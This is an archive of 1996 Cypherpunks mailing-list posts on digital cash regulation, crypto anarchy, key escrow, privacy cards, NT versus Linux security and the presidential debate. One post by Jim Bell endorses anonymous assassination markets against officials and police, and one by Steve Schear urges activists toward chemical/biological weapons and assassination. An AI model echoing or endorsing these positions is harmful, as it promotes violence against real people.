	affords certain insights on the way markets behaved when government
	rules were much less pervasive. These insights, I submit, should be
	considered very carefully as we endeavor to understand and engage
	the new private currency markets of the twenty-first century.

The BIS and similar organisations enjoy a secretive reputation second only
to the spooks.  However, this time, the debate would appear to be being
carried out in public as well.  I would guess that this results because
the digital cash scene is not part of the banking world.  Rather, it is
an invention of cryptographers, programmers and other technologists, and
any debate on the subject must involve them, or drift into fantasy.

Many of us have thought long and hard about how the future will look if
digital cash takes off under a free banking scenario.  The ability of
digital cash to be issued from anywhere, by anyone.  A world where
reputation is everything, and the state has a poor PR team.  We've all
had fun redesigning the world.  But we have all assumed that our designs
will be universally accepted.

What will happen if one side of the Atlantic adopts a free market approach,
whilst the other side decides to regulate?  A standoff between Greenspan's
Wildcats and the Tietmeyer Blitzkriegers?

If such were to develop, it is probable that the battle would develop along
existing Internet lines.  European banks would breath a collective sigh of
relief and get on with the business of converting their existing customer
base over to electronic banking, using the Internet as a new form of
telephone.  They would be safe behind the walls of Fortress Europe, for a
while at least, ignoring the small but annoying inroads of the Internet-
based competition.

In the meantime, the battle for digital money supremacy would be being
fought over in the free market North America.  And what would emerge is
likely to be a powerful, integrated financial system that lives in the
Internet and is cohesive with it.  In the short term, a great shift in
composition would occur as many non-banks enter the banking business.  In
the medium term, after the victor(s) emerge, the fight for growth would
push the battle over to uncommitted peoples such as Asia and the other
Americas.  And in the long term, it's time to take on that last bastion
of regulated banking.

Earlier today, I was guessing that Mr Tietmeyer was buying his banks about
3 years of peace (and nice profits), and there wouldn't be too much of an
opposition to that notion.  But after ploughing my way through today's e$pam
of announcements, I now downgrade the "long term" to 6 months of Indian
summer.  That is, before the ink dries on his new law of banking social
security, it will be about as much use as a printout of an IP packet.

In contrast, Mr Greenspan is signalling the start of an era of bloodletting.
He may stain a few reputations and friendships in the process, and ruin his
chance of a cushy retirement number at anywhere but CitiBank, but he's also
offering the prize of the rest of the world at the end of the battle.  Once
the Internet Financial System settles down into a nice, stable, statistical
industry (run by Americans, of course), then it's time to absorb the rest.

That is, if he is allowed to get his way.  Regardless of Mr Tietmeyer's
preferences for "peace in our time", there is much activity in the digital
cash munitions factories.  Programmers and cryptographers are an
undisciplined lot, as well as being more international than the TLAs give
them credit for.  It is unlikely that they will just hand over their
invention, even if asked nicely.

So what happens next?  Well, banking on the Continent is being wooed with
promises of protection, whilst the soldier ants of the Internet war machine
are gathering on the border.  Indigenous ant production may save them, and
there again, it may not.

To live in interesting times, indeed.

--
iang     06 oct 96
iang@systemics.com

--
References

http://www.bog.frb.fed.us/BOARDDOCS/SPEECHES/S960919.htm is Alan Greenspan
hinting that maybe they shouldn't have set up a central bank in the first
place.

http://www.ffhsj.com/bancmail/tpvtest.htm for an excellent display
on the diplomacy of regulation.

The rest of the above Reuters release:

    Tietmeyer said in the text of a speech to The Economic Club
  of New York that G-10 central bank governors were addressing the
  new payment forms because they may cause difficulties for
  central banks to ensure the integrity of payments.
    Tietmeyer noted European Union central bankers have agreed
  that only banks should issue the pre-paid cards. The policy is
  expected to be widened to include the rights to create and
  maintain Internet-based electronic cash systems.
    ``In our opinion, the same should definitely also apply to
  network money,'' he said.
    Tietmeyer said electronic forms of money tend to crowd out
  currency and deposit money, which may increase the potential for
  credit institutions to create money.
    ``Electronic money may impair the supervisory functions of
  the central bank, or, in other words, its function of ensuring
  the integrity of payments,'' Tietmeyer said in a text of the
  speech released in Frankfurt under embargo.
    ``That would increase the risk of crises in one country
  spreading out to engulf payment systems worldwide,'' he said.
    Electronic purses are plastic cards with a built-in
  micro-chip which stores the electronic cash value of an account
  and can be reloaded at special machines.
    The proposal to restrict such projects to banks is part of a
  new German banking law which is still under preparation but
  expected to be enforced in 1997.
    Tietmeyer said it was difficult to create definitive
  regulations for electronic money at ``this early stage''.
    ``The evolution of electronic money is only in its infancy.
  But it is a characteristic feature of today's world that
  tomorrow's world will be upon us in no time,'' he said.
    Electronic purses, also known as smart cards, are not yet
  available in cash-dominated Germany but tests are being run on
  several projects.
    Internet banking is slowly gaining credence in Germany after
  some of the top banks, including Dresdner Bank AG, launched
  securities trading accounts via the Internet.


--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 7 Oct 1996 10:59:52 +0800
To: cypherpunks@toad.com
Subject: Another view of anarchy...
In-Reply-To: <3.0b28.32.19961006142521.00700398@ricochet.net>
Message-ID: <v03007802ae7e111d0345@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:26 PM -0700 10/6/96, Greg Broiles wrote:

(speaking about Jim Bell and his "assassination politics")

>If what you want is anarchy (and as I understand things, you're arguing
>that people should live by their own interpretation of what's right and
>wrong, and should kill people who disagree with them, which seems like a
>fair although unnecessarily dismal view of anarchy), there's no point in
>arguing about the Constitution.

Speaking as an advocate of what some years ago I dubbed "crypto anarchy," I
have a much more optimistic view of "anarchy." Anarchy is what I see around
me in nearly all areas of human intercourse. What I read, what I eat, what
I watch on t.v., who I talk to, where I go, how I live,...all are
essentially "anarchic," in the sense that no laws (or at least very few
laws) affect my choices. Doesn't mean I have infinite choice, doesn't mean
I have the choices I might want...just means  that no laws by my city,
county, state, or national government have much of anything to say about
these questions. This, to me, is not at all dismal.

As for "assassination politics," I think the theoretical idea of using
betting pools, untraceable payments, etc., are worthwhile _theoretical_
ideas to discuss, occasionally (indeed, I would hope--seriously!--that the
FBI is aware of such possibilities and is thinking about them).

For me, there is no one I can think of that I would want killed. Not my
taunters, not my elected officials (though I despise Senator Fineswine),
not court officials, not even the Devil Himself. Clinton, er, I mean
"Saddam Hussein." The Hitler example ("Wouldn't you go back in time and
kill Hitler if you could?") is so hackneyed as to be meaningless. Actually,
I suppose I would be happy if Pol Pot were to die, and maybe Idi Amin (and
I'm not sure both are still alive), but for the most part I don't think
fundamental problems are directly attributable to specific individuals.

So, this is one of several reasons I rarely discuss "assassination politics."

--Tim May


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Mon, 7 Oct 1996 11:54:31 +0800
To: cypherpunks@toad.com
Subject: Put up or shut up! was Re: legality of wiretapping: a "key" distinction
Message-ID: <v02130500ae7da84d02e8@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


I think those of you who continue to answer the unresearched rants of
amateur lawyers waste your efforts on trying to change the learning habits
of other, hopefully, mature adults.  If it ain't good by now, forget it.

Using, as you say, out-of-the-shower ideas to re-argue settled caselaw are
almost always fruitless.  Since the intents of the ranters are generally
anarchistic, why even involve the law and justice. Even if their ideas have
good philosophical basis there is little hope for the broad changes they
seek in the political or legal landscape (given the powerful and selfish
interests of those inside and outside the beltway) without a great trauma
to the system.  Look at the relatively pitifully accomplishments Jefferson
was able to show for his many years of Republican efforts, and that after
serving two terms as president.

I believe that this is also the case for individuals.  Almost all of us
have great difficulty adopting new behaviors (e.g., dietary, excercise,
change in unhealthy/illegal sexual behavior), even ones thought beneficial,
unless there is great incentive or an experience which is so fundemental
(e.g., near death) that we are forced confront it head on.

My advice to these amateur anarchists is, if they really believe in their
quest,  become professionals and develop and use whatever means (civial
disobedience, crypto, CBW, AP, etc.) they think they require to shock the
system into confronting your demands and see how it plays out.  Otherwise
shut up!



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   |
Sacred Cow Meat Co.       |
---------------------------------------------------------------------

Just say NO to prescription DRUGS.

"Of all tyrannies, a tyranny sincerely exercised for
 the good of its victims may be the most oppressive."
    -- C.S. Lewis

"Surveillence is ultimately just another form of media, and thus, potential
entertainment."
    -- G. Beato






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 7 Oct 1996 12:26:25 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Voice Stress Analysis of Debates?
In-Reply-To: <199610061727.KAA18789@mail.pacifier.com>
Message-ID: <3258641C.32BB@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


jim bell wrote:
> At 09:23 AM 10/6/96 -0700, Dale Thorn wrote:
> >jim bell wrote:
> >> This reminds me...   Years ago, somebody developed a technique called
> >> "Voice Stress Analysis," which was supposed to detect small variations
> >> in a person's voice in response to stress. Not exactly a lie-detector,
> >> but it was supposed to do nearly the same thing.   Does anybody plan
> >> to analyze the debates for stress?  Is there software to do this?
> >> (Tried to do a web-search; didn't see anything.)

> One thing I wonder is this:  Can the stress indications be removed from a
> voice-containing signal by some sophisticated DSP processing?  Just look for
> whatever effect that indicates stress, add it in equal and negative amounts
> to eliminate the apparent stress, etc.    It might not make sense for
> anything less "critical" than debates, but if the control of the debates is
> as monopolized as we think it is, it is reasonable to think that debate
> participants would insist on a certain level of control over the audio signal.

Well, it's been about 20 years since the Stockhausen/Soundstream digital 
reprocessing of the Caruso recordings (other artists as well), and it 
would make sense that "they" can do exactly what you suggest, and very 
well indeed.

If you recorded the debates yourself, and if you could do the analysis 
(much easier than faking anything), you'd have something to compare to 
the talking-head versions from TV.  Unfortunately, the major media will 
not likely present any voice-analysis info unless it's done by one or 
two of the nation's top labs, which (it goes without saying) get most of 
their work presumably from government agencies.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Mon, 7 Oct 1996 12:12:00 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "Drift net fishing," GAK, FBI, and NSA
Message-ID: <v02130502ae7db0e00602@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>>At 2:05 PM -0700 10/6/96, Steve Schear wrote:
>(quoting me)
>
>>Are SSN and other ID required when opening a 'pre-paid' credit card
>>account?  That is, the ones for persons with poor credit who are required
>>to maintain a balance sufficient to pay off the charges?  Perhaps we could
>>put our heads together and determine a way to become franchised by MC/VISA
>>and offer 'affinity' type accounts with no address requirements (all
>>statments are sent via remailer/nym email).
>
>A couple of people on this list talked about a similar thing, a "Privacy
>Card," with the explicit policy of not reporting transactions in detail to
>the Big Three (the government-friendly TRW Credit, Equifax, and Transunion).
>
>The idea being that if a "market for privacy" exists, someone ought to be
>able to make a nice piece of change offering a card that protects privacy.
>
>One problem is that many people _want_ credit card transactions reported to
>the Big Three, to build up their credit record.
>
>(But many don't care. I've been using a VISA card issued by my stock broker
>for 12 years now. It's a "debit card," though it's handled by a merchant
>exactly as a credit card, and they probably can't see any difference. What
>I gathered when buying my current house, is that none of these transactions
>were part of my "credit history," as I was actually using a debit card. All
>of those now using, or planning to use, a debit card would be ideal
>candidates for a "Privacy Card.")

No doubt.

>
>Such a deal would have to be one of Visa, MasterCard, or Discover, with
>American Express a distant fourth. (I don't even know if these
>companies/tradenames would even allow such a thing, of course.) The cost of
>rolling out a brand new type of card would of course be prohibitively high.
>

The banks offering these pre-paid 'credit', really debit, cards are already
offering such an instrument.  Although I've got my hands full at the
moment, I've been asked by several money sources to investigate some
unconventional, but legal, instrument services.  Seems, as you say, you
only have to guarantee the holder that they and establish and transact
business with relatively good anonymity.

>(I have no expectation than this will be done, and I think I said so at the
>time. Ever the realist, in some ways,  I knew no one would take on such a
>complex project. Just as no one followed through with the "Cypherpunks
>Credit Union" idea, discussed at several meetings in 1993.)
>

I'm not making any promises, but I have some banking experience (6 years at
Citicorp) developing financial products, ATM, wireless and transaction
crypto.  The most difficult part, besides the marketing, would be getting a
MC/VISA franchise under acceptable contractual terms.  I've never done this
sort of thing.  Seems you wouldn't need to pitch this to MC/VISA any
different than many of the other similar 'debit' cards.  Unless their
contracts specifically contain a 'know you payee' provision (required for
checking and savings, which are Fed insured, and money transmitters), it
shouldn't be a problem.

-- Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 7 Oct 1996 12:08:51 +0800
To: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Subject: Re: NYT Nix GAK [RANT]
In-Reply-To: <Pine.SUN.3.95.961006141247.22865F-100000@viper.law.miami.edu>
Message-ID: <325866F6.6438@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin - U.Miami School of Law wrote:
> On Fri, 4 Oct 1996, Dale Thorn wrote inter alia:
> > Now, for those folks who oppose the personal ownership of firearms, or
> > at least "really dangerous" firearms, I'd like to know exactly what's
> > the difference (in principle) between the above "...high-quality
> > encryption widely available so that the private sector can protect
> > itself from criminal or...", and making firearms widely available?

> The difference is obvious: crypto does not put holes in people.

Excuse me for saying this, but the above simplistic statement is no more 
valid than saying "...but I only drove the car, I didn't shoot the bank 
teller...", or, "...I only built the plant that made the V2 rockets, I 
didn't fire any...", or, "I support my local police (who shoot people 
sometimes), but I don't believe in killing.", and so on.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 7 Oct 1996 12:31:39 +0800
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: Another view of anarchy...
Message-ID: <199610070228.TAA23790@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:58 PM 10/6/96 -0800, Timothy C. May wrote:
>At 2:26 PM -0700 10/6/96, Greg Broiles wrote:
>
>As for "assassination politics," I think the theoretical idea of using
>betting pools, untraceable payments, etc., are worthwhile _theoretical_
>ideas to discuss, occasionally (indeed, I would hope--seriously!--that the
>FBI is aware of such possibilities and is thinking about them).
>
>For me, there is no one I can think of that I would want killed. Not my
>taunters, not my elected officials (though I despise Senator Fineswine),
>not court officials, not even the Devil Himself. Clinton, er, I mean
>"Saddam Hussein." The Hitler example ("Wouldn't you go back in time and
>kill Hitler if you could?") is so hackneyed as to be meaningless. Actually,
>I suppose I would be happy if Pol Pot were to die, and maybe Idi Amin (and
>I'm not sure both are still alive), but for the most part I don't think
>fundamental problems are directly attributable to specific individuals.

However, it won't really matter, will it?  Unless a person is REALLY 
atypical, nearly all the people he'd want to see dead are similarly hated by 
thousands or millions of others, or they are in classes of people who are 
hated by millions for what they do. (criminals, cops, politicians, and 
despots both domestic and foreign etc.)  That being the case, you personally 
would probably never have to donate anything; you're pretty well assured 
that other people will do this "work" for you.  This is as it should be, I 
suppose.

Furthermore, most of your potential targets (were you to want to name them) 
would probably be fully aware of their vulnerability, and would resign or 
run away or start behaving in hopes of surviving.  

All this is why I think that the status quo might collapse rather suddenly, 
as in Eastern Europe 1989, where in the span of a couple weeks the 
governments fell comparatively bloodlessly.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 7 Oct 1996 11:35:00 +0800
To: GCole@chemson.com (Cole, Geoffrey)
Subject: Re: WINDOWS NT ????
In-Reply-To: <c=GB%a=_%p=CHEMSON%l=CSH_NT0-961006142720Z-908@csa-ntx.chemson.com>
Message-ID: <199610070042.TAA01564@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


> I agree totally, Security on computers in my opinion is like Locks on
> doors, It only keeps honest people out

     Or uneducated/untrained/unintelligent/uncurious ones. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 7 Oct 1996 13:02:38 +0800
To: cypherpunks@toad.com
Subject: Re: Put up or shut up!
In-Reply-To: <v02130500ae7da84d02e8@[10.0.2.15]>
Message-ID: <v03007801ae7e303a52fe@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



Given that Steve Schear has had civil discourse with me, including a
"nicely put" I just read minutes ago, I am not sure he has thought out his
position.

At 6:45 PM -0700 10/6/96, Steve Schear wrote:

>My advice to these amateur anarchists is, if they really believe in their
>quest,  become professionals and develop and use whatever means (civial
>disobedience, crypto, CBW, AP, etc.) they think they require to shock the
>system into confronting your demands and see how it plays out.  Otherwise
>shut up!

My forum is this list, and a few related places. It's a forum comparable,
modulo the times, to the forums other thinkers have had.

I worked very hard a number of years, not participating in politics or
activism, to accumulate enough money so as to now be able to live in peace,
not having to get up at 6 in the morning and fight the commuter traffic so
as to get to my assigned desk by 8 a.m.

I will express my thoughts, my theories, and will develop systems and ideas
as I see fit. However, I have no intention of putting my future at risk by
taking steps such as "civil disobedience" or "assassination politics" which
could very likely result in multimillion dollar fines (hint: such fines
would have great meaning for me) or seizure of my assets and jail time.

Your mileage may vary, but this "amateur anarchist" intends to keep on
doing what he's doing and is not interested in "crossing the line" to the
point where his assets will be seized.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Mon, 7 Oct 1996 13:44:25 +0800
To: "John Fricker" <snow@smoke.suba.com>
Subject: Re: WINDOWS NT ????
Message-ID: <19961007033114906.AAA64@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 6 Oct 1996 01:28:16 -0500 (CDT), snow wrote:

>> An NT machine running off the shelf protocols and services is certainly mor=
>> e secure than your average linux install. Of course clueless administrators=
>>  for either (any) platform can leave the door wide open easily enough.=20

>     How about an "average" NT install versus a "average" linux install? 

Or, better yet, the typical "rent-a-loser" admin install.  You know, the one
who installs everything in the root directory? (I've seen this happen; don't
laugh)

>     Neither of my machines are all that secure, but they don't have to 
>be right now. Neither has more than 5 users, all of whom I either trust 
>personally, or don't know enough to do anything. On the other hand, I 
>would be willing to bet that Mr. Metzger, or adamsc (sorry, I forgot your
>full name) could lock a linux box down as tight as a networked NT machine.

With enough time and net access, just about anyone could - if they thought it
was important.  Unfortunately, many people just don't realize how open their
system is...

>    Hell, I'd bet 20 bucks I could. The machine wouldn't DO a whole lot,
>but it would be tough to break into. (basically, don't run telnetd, ftpd,
>sendmail, run sshd for incoming/outgoing connections, use a secure httpd
>IF NECESSARY, NO NFS, shadow passwords etc.) 

++agree.

>> But what do you mean by secure?

>     Safe from undesired intrusion.

Now, the much harder one is: safe from undesired usage by authorized users. 
As in that guy from the Dept of Health who was handing out the AIDS info...

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Tue, 8 Oct 1996 09:53:39 +0800
To: "vax@linkdead.paranoia.com>
Subject: Re: encrypting pppd?
Message-ID: <19961007204519812.AAA220@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 06 Oct 1996 04:18:04 -0500, VaX#n8 wrote:

>Thinking about it a bit more, if you only encrypt, say, telnet
>then you've got a pretty predictable plaintext stream.  If you
>encrypt the entire link level properly then it might be much harder
>to isolate the nonvariant bits of the protocols since the port and
>that kind of header info is not available to the attacker at that
>level.

What about predictabilities in the PPP datastream?

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Tue, 8 Oct 1996 13:33:02 +0800
To: "matthew@itconsult.co.uk>
Subject: RE: WINDOWS NT ????
Message-ID: <19961007204519812.AAB220@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 6 Oct 1996 11:39:53 +0100, Matthew Richardson wrote:

>> Okay, correct me if I'm wrong on this (as if you wouldn't...):
>> 1. Microsoft markets NT with C2 security
>> 2. Numerous industry magazines report that you can bypass NTFS file 
>> security by booting off of a diskette and using NTFSDOS.
>> 3. Numerous industry magazines (and I believe MS finally mentioned it 
>> in some routine status update) all say that NT should now be considered
>> C2 *ONLY* on machines w/o floppy drives.
>
>Microsoft only claim C2 security when the machine is physically secured 
>and not attached to any network.  Specifically NTFS makes no claim of any 
>encryption and can thus be read by non-NT software.

Now.  They used to claim C2 for a machine w/floppies.  Now they don't.

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Tue, 8 Oct 1996 12:50:35 +0800
To: "jim bell" <azur@netcom.com>
Subject: Re: Voice Stress Analysis of Debates?
Message-ID: <19961007204519812.AAC220@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 06 Oct 1996 15:28:40 -0800, jim bell wrote:

>>BTW, did anyone notice that some of the evening news anchors are imaged via
>>a camera/DSP to render as more youthful (e.g., removing facial wrinkles)?

>Really?  Where'd you hear this? I suppose it's not beyond the realm of 
>possibility, but that would be rather sophisticated programming, 
>particularly in real-time.

One of the big anchors admitted it.  However it was only possible in the
studio.   Might have even been a contrast-lowering gadget.

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 7 Oct 1996 13:53:08 +0800
To: cypherpunks@toad.com
Subject: Re: Put up or shut up!
Message-ID: <v03007803ae7e3604af0d@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


To elaborate on some points I just made....

>My forum is this list, and a few related places. It's a forum comparable,
>modulo the times, to the forums other thinkers have had.

I should also add that I am not encouraging _others_ to break the laws I am
unwilling to break myself, for financial reasons. You won't find me
cheering on people to stop paying taxes, selling secrets about the B-2
bomber to Iran, and so on.

>Your mileage may vary, but this "amateur anarchist" intends to keep on
>doing what he's doing and is not interested in "crossing the line" to the
>point where his assets will be seized.

I believe I am more valuable--in terms of meeting the goals I think are
reasonable for myself and others, and in terms of ultimately moving
things--by doing the work I've done. Now, there are some on this list who
believe I should have been programming Macintosh applications instead of
writing, and some who apparently believe I should be refusing to pay taxes
and fighting the IRS in court, but I believe working on the implications of
"crypto anarchy" is both interesting and important.

Who, after all, pushed for "remailers" at the first Cypherpunks meeting?
Who first (to my knowledge) described how to use the LSB of a digital image
to steganographically store messages, in sci.crypt posts in 1989? Who has
talked for many years about the implications of digital cash for so many
things, including tax policies and government's ability to control
transactions? Who coined several phrases, including "Big Brother Inside"
(in the Intel logo), "National borders are just speed bumps on the
information highway," and other such slogans? Who has attended most
physical CP meetings in the Bay Area (a half dozen others have, too)? Who
wrote a 1.2 MB FAQ on key issues?

Sorry if I sound defensive, but I chafe when I hear nonsense about "Put up
or shut up."

Going to jail is rarely an effective option. Losing my assets and having to
go back to work as a chip physicist even less so.

Look, I've talked about some fairly controversial ideas. But, I think, even
the various lawyers on the list--Brian Davis, ex-DA, Michael Froomkin, law
prof, Black Unicorn, occupation unknown, Greg Broiles, recent law school
grad--will have to admit that nothing I have said as an opinion about what
_might_ happen, about what the implications of strong cryptography might
be, etc., or about what I would _like_ to see happen, is "prosecutable" in
any reasonable sense. Sure, Eugene Debs was thrown in jail for arguing the
military draft was unconstitutional (so much for _his_ free speech), but
that was then and this is now. I don't believe any single post I have ever
made could actually result in prosecution, as I have committed no crimes.

(Nor, for that matter, do I think Jim Bell has ever really "crossed the
line." While some of his posts come perilously close to advocating the
murder of public officials, none of them seem to actually do so, nor to
provide any proof that he is actually conspiring to create an actual
system, even if conspiracy to create such a system could be found to
violate a specific law, absent any actual murders, etc.)

So, I'll "put up or shut up" by continuing my present path. I reject the
idea that one must lay on the tracks as a sacrifice of one's self to the
Cause. Usually it's better to suvive and continue fighting in other ways.

--Tim May


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Mon, 7 Oct 1996 16:15:37 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: White House crypto proposal -- too little, too late
In-Reply-To: <Pine.GSO.3.95.961001145707.23810F-100000@well.com>
Message-ID: <v03007806ae7e2d1e3663@[207.67.246.99]>
MIME-Version: 1.0
Content-Type: text/plain


Declan wrote:
>I just got back from the White House, where Gore's office held a
>roundtable plugging the administration's long-awaited and already
>widely-derided Return of Clipper proposal.
>
>Gore announced that jurisdiction over crypto exports would move to the
>Commerce Dept; that the export embargo on 56-bit DES would be lifted
>in part for two years only; that to be approved for export firms must
>submit a detailed proposal describing how they will move towards key
>escrow; that the new regulations would go into effect on January 1.
>
Although I didn't change the title of this thread, I must disagree.

This is a brilliant move by the government.

They hold a (small) carrot out to industry:
	You can export marginally stronger crypto for 2 years, _if_ you develop a 'key recovery' system. 

At the end of the two years, they tell computer companies:
	Either you implement your system, or you stop exporting your products.
	If we don't like the system that you come up with, we won't approve it; and you can't export your (by then) existing products any more.


The computer industry has to pay the costs for developing this system, _and_, since they developed it, it is really hard for them to complain about the details of it.

Somebody in Washington has a lot on the ball.

And lots of people are falling for it:
    Apple, Atalla, DEC, Groupe Bull, HP, IBM, NCR, RSA, Sun, TIS, and UPS, to name a few.


-- Marshall

Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>

"We're not gonna take it/Never did and never will
We're not gonna take it/Gonna break it, gonna shake it,
let's forget it better still" -- The Who, "Tommy"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Mon, 7 Oct 1996 16:37:34 +0800
To: cypherpunks@toad.com
Subject: U.S. presidential debate: URLs, V-Chip, huge databases
Message-ID: <Pine.GSO.3.95.961006205656.25553D-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Sun, 6 Oct 1996 20:53:38 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
To: fight-censorship@vorlon.mit.edu
Subject: U.S. presidential debate: URLs, V-Chip, huge databases

Tonight's U.S. presidential debate highlighted no embarrassing
missteps by either participant. Like the 1992 debate in Richmond,
Virginia, it spotlighted the issues. It was classy, not memorable.

Except for one sentence that will go down in Net.history -- Bob Dole
ended the 90-minute session with what he framed as an appeal to
younger voters: "If you really want to get involved, tap into my home
page at www.dolekemp96.org. Thank you."

Ain't it hip to be a netizen?

I didn't hear any other Net-references or mentions of encryption,
terrorism legislation, or the CDA during the debate, except for
Clinton's continued support of the V-Chip and universal service for
schools. He said, "Let's make education our priority... so that every
12-year old can log onto the Internet," adding later that he wanted to
wire "all of our classrooms to the Internet by the year 2000."

Not one to let an opportunity to preach censorship pass him by,
Clinton added: "I supported the V-Chip so parents can control what
their kids see... along with rating systems for TV programs." What?
Parents can't control their kids, so government must?

(I fear what the CDA Round II may bring next summer after the Supreme
Court rules, especially if the second try has Congressional backing
and support from a Clinton White House. We may see a law demanding
"voluntary" ratings of web sites with RSACi in exchange for immunity
from prosecution.)

Dole called the use of illegal drugs a heinous crime, accusing Clinton
of being a "liberal." Then, responding to a get-tough-on-guns
challenge from his opponent, Dole suggested a database system that
would check your identity and background before allowing you to buy a
gun: "You put your card in there and if it says 'tilt' you get
nothing. No guns. Zippo."

These are hardly the words of someone who gives a rat's ass about
privacy. What's worse, elephantine government databases or V-chip
style censorship? All I know is that neither of 'em has my vote.

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
